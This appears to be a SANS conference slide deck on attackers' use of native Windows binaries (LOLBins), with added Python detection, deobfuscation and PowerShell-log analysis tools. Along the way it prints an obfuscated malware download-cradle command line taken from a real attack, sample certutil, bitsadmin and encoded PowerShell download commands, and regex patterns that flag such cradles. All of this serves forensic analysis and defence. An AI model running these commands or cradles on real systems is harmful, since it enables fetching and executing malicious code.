
Alissa Torres

@sibertor
#SANSEnterpriseSummit
3 JUN 2019
“Living off the Land” is attributed to Matt Graeber (@mattifestation)

Actions on objective that make use of native Windows binaries, scripts and/or libraries

Goal: extend survivability and stay within the sphere of normal network & host activity
Re-purposed native Windows binaries, scripts and libraries allow the attacker to achieve stages of the Kill Chain undetected.

LoLBin chains are common: a download cradle obtains a malicious DLL, registers it and establishes persistence, all with native tooling.

Example: autostart entries (most often the HKCU Run key) launch PowerShell, regsvr32 or rundll32, which downloads, decodes and invokes a script.
GITHUB.COM/LOLBAS-PROJECT/LOLBAS
Criteria to become a LOLBAS:
§ Microsoft-signed file, either native to the OS or downloaded from Microsoft
§ Must have “unexpected functionality” and a means of being repurposed
§ Must have functionality that would be useful to an APT or Red Team
Oddvar Moe (@api0cradle) maintains the LOLBAS project.
For more info, see the LOLBAS Project: https://lolbas-project.github.io/

“Live off the Land” binary | Legitimate Use | Mis-use Technique
msiexec.exe (T1218: Signed Binary Proxy Execution) | Windows utility that supports install, config and removal of Windows installer files | Used to execute DLLs or rogue .msi files
bginfo.exe | Displays host info on desktop | Invokes VBS script to launch payload
certutil.exe (T1218) | Dumps & displays CA config info, verifies certs | Used to bypass whitelisting to download & write arbitrary data to the filesystem
atbroker.exe (T1218) | Assistive technology support | Registers and launches a rogue assistive technology; works as a standard user
installutil.exe (T1118) | Executes installer components specified in .NET binaries | Used to bypass whitelisting; proxy execution
mavinject32.exe (T1218) | Windows utility that allows for code injection | Used to bypass whitelisting
T1197 - BITS Jobs: used by Windows Update to download updates without interrupting or requiring interaction with the user.

[binary name not preserved in the slide export].EXE (2015+): DECODE/ENCODE/AV-BYPASS. Misused in the wild since 2015.

Example: Poweliks

1. Whitelisted binary (rundll32.exe): calls execution of an exported function of an arbitrary DLL
2. Module that contains HTTP functionality: mshtml.dll
3. Exported function within mshtml.dll (RunHTMLApplication)
4. Function parameters: lead to execution of JavaScript from the Run key in an uncontrolled environment
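The misuse column of the table above, the BITS slide and the Poweliks rundll32 chain can be turned into a first-pass triage over process command lines or Run-key values. The following is an added example in Python, not from the talk: the sample events and their example.invalid URLs are constructed, and the switches the rules look for (certutil -urlcache/-decode/-encode, bitsadmin /transfer, regsvr32 /i: with scrobj.dll, installutil /U, atbroker /start, mavinject /INJECTRUNNING, msiexec /y with a DLL, bginfo with a .bgi and /nolicprompt) are the documented abuse forms of those binaries rather than text from the slides. It also decodes powershell -EncodedCommand (base64 of UTF-16LE) before matching, since that is how a cradle in a Run key is usually hidden.

```python
"""Flag LOLBin proxy-execution and download-cradle patterns in process command lines."""
import base64
import re

# One rule per misuse pattern. Labels use the ATT&CK IDs the slides cite
# (T1218 Signed Binary Proxy Execution, T1197 BITS Jobs, T1118 InstallUtil).
RULES = [
    ("T1218 rundll32: javascript: handler via mshtml (Poweliks-style)",
     re.compile(r"rundll32(\.exe)?.*javascript:", re.I)),
    ("T1218 regsvr32: scriptlet loaded from a URL / scrobj.dll",
     re.compile(r"regsvr32(\.exe)?.*(/i:\s*https?://|scrobj\.dll)", re.I)),
    ("T1218 certutil: download, or decode/encode a file on disk",
     re.compile(r"certutil(\.exe)?.*\s-(urlcache|decode|encode)\b", re.I)),
    ("T1197 bitsadmin: BITS job used as a download cradle",
     re.compile(r"bitsadmin(\.exe)?.*/(transfer|addfile|create)\b", re.I)),
    ("T1218 msiexec: remote .msi install or DLL registration (/y)",
     re.compile(r"msiexec(\.exe)?.*(/i\s+https?://|/[yz]\s+\S+\.dll)", re.I)),
    ("T1118 installutil: assembly executed through the /U (uninstall) path",
     re.compile(r"installutil(\.exe)?.*\s/u\b", re.I)),
    ("T1218 atbroker: assistive technology started by name",
     re.compile(r"atbroker(\.exe)?.*\s/start\b", re.I)),
    ("T1218 mavinject: DLL injected into a running PID",
     re.compile(r"mavinject(32)?(\.exe)?.*\s/injectrunning\b", re.I)),
    ("bginfo: .bgi configuration run silently (can carry VBScript)",
     re.compile(r"bginfo(\.exe)?.*\.bgi.*/nolicprompt", re.I)),
    ("PowerShell download cradle",
     re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string", re.I)),
]

# powershell -e / -ec / -enc / -EncodedCommand <base64 of the UTF-16LE script text>
ENC_RE = re.compile(r"-e(?:[nc][a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not base64, or not UTF-16LE text
        return None


def classify_cmdline(cmdline):
    """Rule labels matching the command line (and its decoded -enc payload, if any)."""
    hits = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("PowerShell -EncodedCommand decoded: " + decoded.strip())
    for label, rx in RULES:
        if rx.search(cmdline) or (decoded is not None and rx.search(decoded)):
            hits.append(label)
    return hits


# Constructed sample process-creation events (not real telemetry); hosts use .invalid.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()   # how -enc payloads are built
SAMPLE_EVENTS = [
    {"image": "notepad.exe", "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/p.txt C:\\Users\\Public\\p.txt"},
    {"image": "bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer job /download /priority normal "
                "http://example.invalid/a.exe C:\\Users\\Public\\a.exe"},
    {"image": "rundll32.exe",
     "cmdline": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";eval("1")'},
    {"image": "powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
]


def triage(events):
    """(image, hits) for every event that trips at least one rule."""
    findings = []
    for ev in events:
        hits = classify_cmdline(ev["cmdline"])
        if hits:
            findings.append((ev["image"], hits))
    return findings


if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS):
        print(image, "->", "; ".join(hits))
```

The same rules apply to the Data column of Run-key values pulled from an NTUSER.DAT hive, which is where the chain on the slide starts; the benign notepad event is there to show the rules stay quiet on ordinary command lines.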
bginfo.exe: System Info Display Tool

Gathers and creates a Windows bitmap of host details such as hostname, network config, OS version, hardware specs.

For more info: docs.microsoft.com/en-us/sysinternals

Can be configured to run VBS scripts, for example to execute a Meterpreter payload:
https://github.com/Cn33liz/VBSMeter/blob/master/VBSMeter.vbs

For more info on misuse: oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
SRUM (System Resource Usage Monitor): Evidence of Execution and Network Usage
• Where is it found? The SRUM extension mappings in the SOFTWARE registry hive and the ESE database %SystemRoot%\System32\sru\SRUDB.dat
• What does it contain? Energy utilization; network usage per application per network
VELOCIRAPTOR: triage and Endpoint Detection and Response tool that supports Linux, macOS & Windows

Standalone analysis, or via a Collection Server for collections across the enterprise

Supports customized definitions of artifacts, YARA signatures & VQL (Velociraptor Query Language)

Upon detection, dumps the process memory of matches

Example artifacts:
• Windows.Triage.ProcessMemory
• Windows.Triage.Collectors.WindowsFirewall
• Windows.Triage.Collectors.StartupInfo
• Windows.Triage.Collectors.SRUM
• Windows.Detection.ProcessMemory
• Windows.Events.ProcessCreation
• Windows.Registry.Sysinternals.Eulacheck

Windows.System.Pslist output columns: PID | PPID | PROCESS | PROCESS PATH | ACCOUNT
Cyber Analytic Repository Exploration Tool (CARET): https://mitre-attack.github.io/caret
ATT&CK™ Matrix for APT “Cobalt Group”:
PERSISTENCE: New Service, Redundant Access, Registry Keys, Scheduled Task
PRIVILEGE ESCALATION / DEFENSE EVASION: UAC Bypass Techniques, File Deletion, Obfuscated Files, Process Injection, Regsvr32
CREDENTIAL ACCESS: (none listed)
DISCOVERY: Network Service
LATERAL MOVEMENT: Remote Desktop, Remote File Copy
EXECUTION: Exploit for client, PowerShell, Regsvr32, Scheduled Task, Scripting
COLLECTION: (none listed)
EXFILTRATION: (none listed)
COMMAND & CONTROL: Remote Access Tools, Remote File Copy, Standard Application
1. User clicks on a .lnk file masquerading as a BMP file; it launches the browser and directs it to the Adobe Flash Update page.
2. As a secondary action, PowerShell downloads another script.
3. The 2nd script downloads a zip file containing a DLL that is copied to the Startup folder.
PROCDOT: VISUAL MALWARE ANALYSIS TOOL
For more info: http://www.procdot.com

Correlates ProcMon and PCAP data to track malicious code execution. Provides an interactive timeline of file system and registry changes and network traffic.

Command line launched by the .lnk (cmd.exe variable-substring obfuscation; /V enables delayed expansion):

    "C:\Windows\system32\cmd.exe"" /V /C set x4OAGWfxlES02z6NnUkK=2whttpr0&&set L1U03HmUO6B9IcurCNNlo4=.com&& echo | start %x4OAGWfxlES02z6NnUkK:~2,4%s://get.adobe%L1U03HmUO6B9IcurCNNlo4%/br/flashplayer/

%x4OAGWfxlES02z6NnUkK:~2,4% takes 4 characters starting at offset 2 of "2whttpr0", i.e. "http"; the second variable supplies ".com". Resolved:

    "C:\Windows\system32\cmd.exe"" /V /C echo | start https://get.adobe.com/br/flashplayer/

Second-stage command line, assembling a PowerShell New-Object Net.WebClient download cradle from the same two variables plus further %...% names that are not set in this command line:

    C:\Windows\system32\cmd.exe /S /D /c"" echo %jA8Axao1xcZ%(""%jA8Axao1xcZ%(NEw-o%KNhGmAqHG5%ct NeT.wEbcLient).down%4kxhaz6bqqKC%S%WMkgA3uXa1pXx%NG('%x4OAGWfxlES02z6NnUkK:~2,4%s://s3-eu-west-1.amazonaws%L1U03HmUO6B9IcurCNNlo4%/juremasobra2/jureklarj934t9oi4%Kpl01SsXY5tthb1%')""); ""
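Resolving these by hand does not scale, and the partial decode on the slide shows how easy it is to stop one step early. Below is an added Python emulation (not from the talk) of the cmd.exe expansion rules such one-liners rely on: `set NAME=VALUE`, `%NAME%`, `%NAME:~start,len%` substrings, `%NAME:find=repl%` replacement and the `!NAME!` form enabled by /V. The two inputs are the command lines from the ProcDot trace re-joined onto single lines. Feeding the first command's variables into the second assumes the second cmd.exe inherits the environment the first one set (a descendant-process assumption, not something the slide states); any name that still cannot be resolved is reported rather than guessed, which is the honest answer for %jA8Axao1xcZ% and friends.

```python
"""Emulate the cmd.exe expansion that the obfuscated one-liners above rely on."""
import re

# `set NAME=VALUE` runs up to the next operator; cmd keeps trailing spaces in VALUE.
SET_RE = re.compile(r"\bset\s+([A-Za-z0-9_]+)=([^&|<>]*)", re.IGNORECASE)

# %NAME%   %NAME:~start[,len]%   %NAME:find=repl%   and the !NAME! forms used with /V:ON
VAR_RE = re.compile(
    r"([%!])([A-Za-z0-9_]+)"
    r"(?::~(-?\d+)(?:,(-?\d+))?|:([^=%!]+)=([^%!]*))?"
    r"\1"
)


def substring(value, start, length=None):
    """%VAR:~start,len% semantics: negative start counts from the end, negative len trims the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    if length < 0:
        return value[start:max(n + length, 0)]
    return value[start:start + length]


def collect_env(cmdline, inherited=None):
    """Environment after every `set` in cmdline has run (names are case-insensitive)."""
    env = dict(inherited or {})
    for name, value in SET_RE.findall(cmdline):
        env[name.lower()] = value
    return env


def expand(text, env):
    """Expand variable references; unknown names stay literal, as cmd.exe leaves them."""
    unresolved = []

    def repl(m):
        name = m.group(2)
        if name.lower() not in env:
            unresolved.append(name)
            return m.group(0)
        value = env[name.lower()]
        if m.group(3) is not None:                       # substring form
            length = int(m.group(4)) if m.group(4) is not None else None
            return substring(value, int(m.group(3)), length)
        if m.group(5) is not None:                       # find=repl form, case-insensitive
            return re.sub(re.escape(m.group(5)), lambda _: m.group(6), value, flags=re.IGNORECASE)
        return value

    return VAR_RE.sub(repl, text), list(dict.fromkeys(unresolved))


def deobfuscate_cmd(cmdline, inherited=None):
    """Drop the `set` statements, expand what remains, and report unresolved names."""
    env = collect_env(cmdline, inherited)
    parts = [SET_RE.sub("", seg).strip() for seg in cmdline.split("&&")]
    parts = [p for p in parts if p]
    if not parts:
        return "", []
    payload = parts[0]
    for seg in parts[1:]:
        # after `cmd /C set ...&&`, the next command is still the /C argument: join with a space
        payload += (" " if re.search(r"/[ck]\s*$", payload, re.IGNORECASE) else " && ") + seg
    return expand(payload, env)


# The two command lines from the ProcDot trace, re-joined onto single lines.
LNK_CMD = (
    r'''"C:\Windows\system32\cmd.exe"" /V /C set x4OAGWfxlES02z6NnUkK=2whttpr0&&'''
    r'''set L1U03HmUO6B9IcurCNNlo4=.com&& echo | start '''
    r'''%x4OAGWfxlES02z6NnUkK:~2,4%s://get.adobe%L1U03HmUO6B9IcurCNNlo4%/br/flashplayer/'''
)
STAGE2_CMD = (
    r'''C:\Windows\system32\cmd.exe /S /D /c"" echo %jA8Axao1xcZ%(""%jA8Axao1xcZ%'''
    r'''(NEw-o%KNhGmAqHG5%ct NeT.wEbcLient).down%4kxhaz6bqqKC%S%WMkgA3uXa1pXx%NG('''
    r"""'%x4OAGWfxlES02z6NnUkK:~2,4%s://s3-eu-west-1.amazonaws%L1U03HmUO6B9IcurCNNlo4%"""
    r'''/juremasobra2/jureklarj934t9oi4%Kpl01SsXY5tthb1%')""); ""'''
)

if __name__ == "__main__":
    first, _ = deobfuscate_cmd(LNK_CMD)
    # assumption: the second cmd.exe inherits the variables the first one set
    second, missing = deobfuscate_cmd(STAGE2_CMD, inherited=collect_env(LNK_CMD))
    print(first)
    print(second)
    print("unresolved:", ", ".join(missing))
```

The unresolved list is the work item: those names were set by some other stage (a parent process or an earlier script), so the next place to look is the environment block of the parent in the process tree or the prior 4688/Sysmon events, not a guess at what "NEw-o...ct" was meant to spell.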
28+ Threat Groups are known to use
Powershell Execution for Post-Exploitation
https://mitre-attack.github.io/caret
Forensic Analyst Activity Post-Attack

Execution of PowerShell (Prefetch, Shimcache, Amcache)

Event IDs 40961, 40962 (console start) or 4103 (module logging), 4104 (Script Block Logging) in the Microsoft-Windows-PowerShell/Operational log

PowerShell command history logged in ConsoleHost_history.txt under <User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline

Analysis of PowerShell, conhost, wsmprovhost process memory

Fileless malware attacks are 10x more likely to succeed than file-based attacks. – Ponemon Institute 2018
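Script Block Logging (4104) writes long blocks as several events that share one ScriptBlockId, so the analyst has to reassemble them before searching for cradles, and an empty Path field is itself a fileless indicator. The following is an added example (not from the talk) that does that over constructed 4104 EventData records; the ScriptBlockId values are made up, the field names are the ones the Microsoft-Windows-PowerShell/Operational log carries.

```python
"""Reassemble chunked PowerShell 4104 script blocks and flag cradle indicators."""
import re
from collections import defaultdict

# Constructed sample events (not real logs). Event 4104 EventData carries MessageNumber of
# MessageTotal, ScriptBlockText, ScriptBlockId and Path; Path is empty when the block never
# came from a file. The chunks are deliberately out of order, and block "b3" is missing part 2.
SAMPLE_4104 = [
    {"ScriptBlockId": "b1", "MessageNumber": 2, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "IEX $c.DownloadString('http://example.invalid/stage2.ps1')"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1, "Path": "C:\\scripts\\inventory.ps1",
     "ScriptBlockText": "Get-Process | Select-Object Name, Id | Export-Csv C:\\temp\\procs.csv"},
    {"ScriptBlockId": "b1", "MessageNumber": 1, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "$c = New-Object Net.WebClient; "},
    {"ScriptBlockId": "b3", "MessageNumber": 1, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "$b = [Convert]::FromBase64String($env:x); "},
]

CRADLE_RE = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string",
    re.I)


def reassemble(events):
    """Map ScriptBlockId -> {text, complete, fileless}; chunks may arrive in any order."""
    chunks = defaultdict(dict)
    meta = {}
    for ev in events:
        sbid = ev["ScriptBlockId"]
        chunks[sbid][int(ev["MessageNumber"])] = ev["ScriptBlockText"]
        meta[sbid] = (int(ev["MessageTotal"]), ev.get("Path", ""))
    blocks = {}
    for sbid, parts in chunks.items():
        total, path = meta[sbid]
        complete = all(i in parts for i in range(1, total + 1))
        text = "".join(parts[i] for i in sorted(parts))   # partial blocks keep what was logged
        blocks[sbid] = {"text": text, "complete": complete, "fileless": path == ""}
    return blocks


def find_cradles(events):
    """(ScriptBlockId, complete, fileless, indicators) for blocks containing cradle indicators."""
    findings = []
    for sbid, block in reassemble(events).items():
        found = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(block["text"])})
        if found:
            findings.append((sbid, block["complete"], block["fileless"], found))
    return findings


if __name__ == "__main__":
    for sbid, complete, fileless, found in find_cradles(SAMPLE_4104):
        state = "complete" if complete else "PARTIAL"
        origin = "in-memory" if fileless else "from file"
        print(f"{sbid}: {state}, {origin}, indicators={found}")
```

Grepping single 4104 events for "DownloadString" would have missed nothing here, but a cradle split across a chunk boundary is exactly the case that matters, and the PARTIAL flag tells you when the log has been truncated or cleared before you draw conclusions from what is left.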


The creation time of the shortcut file pointing to the malicious LNK file shows first access. Shortcut files are small, and often all of the data is contained in the MFT entry itself (resident data), as shown here.
LIVING OFF THE LAND TECHNIQUES
§ Living Off The Land Binaries And Scripts (LOLBins and LOLScripts): https://github.com/api0cradle/LOLBAS
§ Hexacorn blog: http://www.hexacorn.com/blog/?s=bginfo

POWERSHELL DEOBFUSCATION
§ Under the Wire PowerShell Wargames: underthewire.tech
§ Finding and Decoding Malicious PowerShell Scripts - Mari DeGrazia: http://blogspot.com/2017/10/finding-and-decoding-malicious
§ Download Cradles: https://gist.github.com/HarmJ0y/bb48307ffa663256e239
